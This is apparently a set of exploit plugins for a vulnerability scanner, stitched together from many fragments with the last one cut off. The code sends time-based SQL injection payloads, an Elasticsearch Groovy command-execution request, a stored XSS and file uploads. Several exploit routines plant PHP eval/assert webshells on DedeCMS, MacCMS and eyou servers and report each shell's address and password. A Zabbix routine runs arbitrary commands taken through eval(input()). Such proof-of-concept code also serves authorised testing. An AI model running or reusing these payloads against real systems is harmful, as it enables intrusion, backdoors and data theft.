def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
url = self.target
payload1 = '''__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJNTU4MTMwNTc4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgULY2JJc1JlbWViZXIFDEltYWdlQnV0dG9uMRgx6d11G2zzWntRDJIZph4YGLVfZouvWjmVDOX9030f&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEdAAdHo7ESDfB43eQm%2B%2BaON1gP9Tt6KoVd96dN6zOjIKoOlHY2%2BMc6SrnAqio3oCKbxYaDr609gOYlKV%2BbpnR3q6Cx6ZACrx5RZnllKSerU%2BIuKsmrE4D3DRrem1MsGaBV0yK61SaGzux4XzPTjGFgzHLb%2Fp0Y6tcT3dZFQrnTSmlg62gf3LfDgkRp4YSzbmd%2Bkow%3D&txtUserID=admin&txtPassword=admin&ImageButton1.x=47&ImageButton1.y=3&hidFileldBrowserName=chrome44.0.2403.157&hidFileldBrowserShell=chrome%E6%B5%8F%E8%A7%88%E5%99%A8'''
payload2 = '''__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNTU4MTMwNTc4D2QWAgIDD2QWAgIJDw8WAh4EVGV4dAUb55So5oi35Z
CN5oiW5a+G56CB6ZSZ6K+v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFC2NiSXNSZW1lYmVyBQxJbW
FnZUJ1dHRvbjGUTVIt9MPbBGiuZg4jaDZnl7GGp6LqcBtLSKtVgDP4lw==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARG
ET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAAeUy/Z893jBDhlvaCCBA+8t9Tt6KoVd96dN6zOjIKoOlHY2+Mc6SrnAq
io3oCKbxYaDr609gOYlKV+bpnR3q6Cx6ZACrx5RZnllKSerU+IuKsmrE4D3DRrem1MsGaBV0yK61SaGzux4XzPTjGFgzHLb10b6b
QvRNPx/1qIXDYnt2YfQsDSjm01CMQ7LbBqb8j0=&txtUserID=admin';WAITFOR DELAY '0:0:5'--&txtPassword=admin&I
mageButton1.x=47&ImageButton1.y=3&hidFileldBrowserName=chrome44.0.2403.157&hidFileldBrowserShell=chr
ome%E6%B5%8F%E8%A7%88%E5%99%A8'''
start_time = time.time()
_response = requests.post(url, data=payload1)
end_time1 = time.time()
_response = requests.post(url, data=payload2)
end_time2 = time.time()
if (end_time1-start_time) - (end_time2-end_time1) > 5:
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常:{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
data1 = '''{"name": "csancsan"}'''
r1 = requests.post(
'{target}/website/blog/'.format(target=self.target), data=data1)
head = {
'User-Agent': 'Mozilla/5.0',
'Content-Type': 'application/json'
}
payload = {"size": 1, "script_fields": {"lupin": {
"lang": "groovy", "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
r2 = requests.post('{target}/_search?pretty'.format(
target=self.target), headers=head, data=json.dumps(payload))
# print(r2.text)
if 'uid' in r2.text and 'gid' in r2.text and 'groups' in r2.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
url = self.target
# del passlog
del_url = '%s/picup.php?action=del&pic=../data/log/passlog.php' % url
requests.get(del_url)
# submit code
login_url = '%s/login.php?action=login&lonadmin=1' % url
login_data = {
'loginuser': '******',
'loginpass': '******'
}
requests.post(login_url, data=login_data)
# return page
verify_url = '%s/data/log/passlog.php' % url
content = requests.get(verify_url).text
if 'cfcd208495d565ef66e7dff9f98764da' in content:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
testurl = urllib.parse.urljoin(arg,
'/maxImageUpload/original/1.php')
vulurl = urllib.parse.urljoin(arg, '/maxImageUpload/index.php')
payload = {
'myfile':
('1.php', '<?php echo md5(0x2333333);unlink(__FILE__);?>',
'image/jpeg')
}
data = {'submitBtn': 'Upload'}
requests.post(vulurl, files=payload, data=data).text
resp = requests.get(testurl)
if '5a8adb32edd60e0cfb459cfb38093755' in resp:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# payload路径根据实际情况确定
# select '<?php echo md5(c)?>c' into outfile '/var/eyou/apache/htdocs/php/bill/script/index.php';
payload = '/php/bill/print_addfeelog.php'
headers = {'Cookie': 'cookie=1;'}
data = 'all_sql=c2VsZWN0ICc8P3BocCBlY2hvIG1kNShjKT8+YycgaW50byBvdXRmaWxlICcvdmFyL2V5b3UvYXBhY2hlL2h0ZG9jcy9waHAvYmlsbC9zY3JpcHQvaW5kZXgucGhwJzs='
url = self.target + payload
requests.post(url, headers=headers, data=data)
verify_url = self.target + '/var/eyou/apache/htdocs/php/bill/script/index.php'
r = requests.get(verify_url)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# payload路径根据实际情况确定
# select '<?php echo md5(c); eval($_POST[c])?>c' into outfile '/var/eyou/apache/htdocs/php/bill/script/index.php';
payload = '/php/bill/print_addfeelog.php'
headers = {'Cookie': 'cookie=1;'}
data = 'all_sql=c2VsZWN0ICc8P3BocCBlY2hvIG1kNShjKTsgZXZhbCgkX1BPU1RbY10pPz5jJyBpbnRvIG91dGZpbGUgJy92YXIvZXlvdS9hcGFjaGUvaHRkb2NzL3BocC9iaWxsL3NjcmlwdC9pbmRleC5waHAnOw=='
url = self.target + payload
requests.post(url, headers=headers, data=data)
verify_url = self.target + '/var/eyou/apache/htdocs/php/bill/script/index.php'
r = requests.get(verify_url)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.
format(target=self.target,
name=self.vuln.name,
url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payload = "/?m=im&a=getDayRecord"
url = self.target + payload
data_sleep = "user_id=1' and 1=2 UNION SELECT sleep(10),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40#"
data_normal = "user_id=1' and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40#"
time_start = time.time()
requests.post(url, data=data_normal)
time_end_normal = time.time()
requests.post(url, data=data_sleep)
time_end_sleep = time.time()
if (time_end_sleep - time_end_normal) - (time_end_normal -
time_start) > 9:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
payload = 'wp-content/plugins/simple-ads-manager/sam-ajax-admin.php'
url = arg + payload
post_data1 = 'action=load_posts&cstr==1&sp=Post&spg=Page'
post_data2 = 'action=load_posts&cstr==1%27)%20AND%20SLEEP(5)%20AND%20(%27WhYm%27=%27WhYm&sp=Post&spg=Page'
start_time1 = time.time()
req1 = requests.post(url, data=post_data1)
end_time1 = time.time()
_req2 = requests.post(url, data=post_data2)
if (req1.status_code == 200 or _req2.status_code == 200) and (
(time.time() - end_time1) - (end_time1 - start_time1)) > 5:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payload = '/FrogCMS-master/admin/?/page/edit/3'
# 首先注册用户。
# 获取cookies
cookies = {}
raw_cookies = 'current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e'
for line in raw_cookies.split(';'):
key, value = line.split('=', 1) # 1代表只分一次,得到两个数据
cookies[key] = value
#print (cookies)
data = 'page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/><script>confirm(1234)</script>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close'
url = self.target + payload
requests.post(url, cookies=cookies, data=data)
verify_url = self.target + '/FrogCMS-master/?about_us'
r = requests.get(verify_url)
if "<script>confirm(1234)</script>" in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 先注册一个帐号并登录,然后访问:
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
payload = "/admin.php?c=syscontroller&m=add&post=1"
data = "data%5Bname%5D=myndtt*/phpinfo();/*&data%5Bcname%5D=myndtt&app=0&data%5Btype%5D%5B%5D=0&data%5Bmeta_title%5D=1234&data%5Bmeta_keywords%5D=123&data%5Bmeta_descrintion%5D=123"
url = self.target + payload
requests.post(url, cookies=cookies, data=data)
verify_url = self.target + '/index.php?c=myndtt&m=index'
r = requests.get(verify_url)
if 'PHP Version' in r.text and 'System' in r.text:
self.output.report(
self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
target=self.target,
name=self.vuln.name,
url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payload = ' /hdwiki/index.php?pic-search'
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36',
}
data_sleep = "searchtext=%E7%9B%B8%e9%8c%a6' UNION SELECT if(user()=user(),sleep(10),1)#&searchfull=%CD%BC%C6%AC%CB%D1%CB%F7"
data_normal = "searchtext=%E7%9B%B8%e9%8c%a6' UNION SELECT if(user()=user(),md5(c),1)#&searchfull=%CD%BC%C6%AC%CB%D1%CB%F7"
url = self.target + payload
time_start = time.time()
requests.post(url, data=data_normal)
time_end_normal = time.time()
requests.post(url, data=data_sleep)
time_end_sleep = time.time()
if (time_end_sleep - time_end_normal) - (time_end_normal -
time_start) > 9:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
url = self.target + "/web/member/memberSurveyAction!answerQuestion.do"
headers = {
"Content-Length": "2916",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Cookie":
"JSESSIONID=ADEB3C74B5159E2AC9A0AB6AC0C1050C-n1.jvm1; pvndwvyk=1",
"Connection": "Keep-alive",
"Accept-Encoding": "gzip,deflate",
"User-Agent":
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36",
"Accept": "*/*"
}
payload = "answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND 'Pesh'='Pesh&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&[email protected]&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F"
payload1 = "answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND 'Pesh'='hyhmnn&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&[email protected]&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F"
_response = requests.post(url, data=payload, headers=headers)
_response1 = requests.post(url, data=payload1, headers=headers)
if _response.text != _response1.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常:{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
headers = {
'User-Agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36',
'X-FORWARDED-FOR': '221.179.180.156'
}
payloads = list('@abcdefghijklmnopqrstuvwxyz.0123456789')
url = self.target + '/cpapi/qxtapi.php'
data_sleep = "<aaaa><Body><Message><SrcMobile>0</SrcMobile><Content>123123</Content><RecvTime>0'|sleep(5)#</RecvTime></Message></Body></aaaa>"
data_normal = "<aaaa><Body><Message><SrcMobile>0</SrcMobile><Content>123123</Content><RecvTime>0'|sleep(0)#</RecvTime></Message></Body></aaaa>"
time_start = time.time()
requests.post(url, data=data_normal, headers=headers, timeout=3)
time_end_normal = time.time()
requests.post(url, data=data_sleep, headers=headers, timeout=3)
time_end_sleep = time.time()
if (time_end_sleep - time_end_normal) - (time_end_normal -
time_start) > 4:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payload = '/cacti/graphs_new.php'
url = self.target + payload
data_sleep = "__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save"
data_normal = "__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select md5(c))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save"
time_start = time.time()
requests.post(url, data_normal)
time_end_normal = time.time()
requests.post(url, data_sleep)
time_end_sleep = time.time()
if (time_end_sleep - time_end_normal) - (time_end_normal -
time_start) > 4:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞;\n漏洞地址为{url};具体请查看漏洞详情'.format(
target=self.target, name=self.vuln.name, url=url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# payload根据实际情况确定
payload = '/webmail/client/pab/index.php?module=operate&action=contact-del'
data_sleep = "contact_ids=-1) or sleep(5)%23"
data_normal = "contact_ids=-1) or 1%23"
url = self.target + payload
time_start = time.time()
requests.post(url, data=data_normal)
time_end_normal = time.time()
requests.post(url, data=data_sleep)
time_end_sleep = time.time()
if (time_end_sleep - time_end_normal) - (time_end_normal -
time_start) > 4:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
url = self.target + \
'/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct'
timeout = 5
start_time = time.time()
payload = {
'name': "wp_users WHERE 42=42 AND SLEEP({})--;".format(timeout)
}
_response = requests.post(url, data=payload)
end_time1 = time.time()
payload1 = {'name': "wp_users WHERE 42=42 AND SLEEP(5)--;"}
_response = requests.post(url, data=payload1)
end_time2 = time.time()
if (end_time2 - end_time1) - (end_time1 - start_time) >= timeout:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常:{}'.format(e))
def exploit(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 会在plus目录生成 x.php 密码 m
# http://127.0.0.1/plus/x.php
payload = "/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35"
url = self.target + payload
requests.post(url)
requests.get(self.target + '/plus/mytag_js.php?aid=1')
url1 = self.target + '/plus/x.php'
r = requests.get(url1)
if r.status_code == 200:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞,,已上传webshell地址:{url}密码为m,请及时删除。'.
format(target=self.target, name=self.vuln.name, url=url1))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payload = "/index.php?m=vod-search"
data = "wd={if-A:assert($_POST[c])}{endif-A}"
url = self.target + payload
requests.post(url, data=data)
verify_url = url + '&wd={if-A:assert($_POST[c])}{endif-A}'
verify_data = 'c=phpinfo()'
r = requests.post(verify_url, data=verify_data)
if 'PHP Verison' in r.text and 'System' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.
format(target=self.target,
name=self.vuln.name,
url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
url = self.target + '/api_jsonrpc.php'
login = '******' # Zabbix login
password = '******' # Zabbix password
hostid = '10084' # Zabbix hostid
payload = {
"jsonrpc": "2.0",
"method": "user.login",
"params": {
'user': ""+login+"",
'password': ""+password+"",
},
"auth": None,
"id": 0,
}
headers = {
'content-type': 'application/json',
}
auth = requests.post(url, data=json.dumps(
payload), headers=(headers))
try:
auth = auth.json()
except:
return
cmd = eval(input('\033[41m[zabbix_cmd]>>: \033[0m '))
# update
payload = {
"jsonrpc": "2.0",
"method": "script.update",
"params": {
"scriptid": "1",
"command": ""+cmd+""
},
"auth": auth['result'],
"id": 0,
}
cmd_upd = requests.post(
url, data=json.dumps(payload), headers=(headers))
# execute
payload = {
"jsonrpc": "2.0",
"method": "script.execute",
"params": {
"scriptid": "1",
"hostid": ""+hostid+""
},
"auth": auth['result'],
"id": 0,
}
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常:{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 获取网站绝对路径
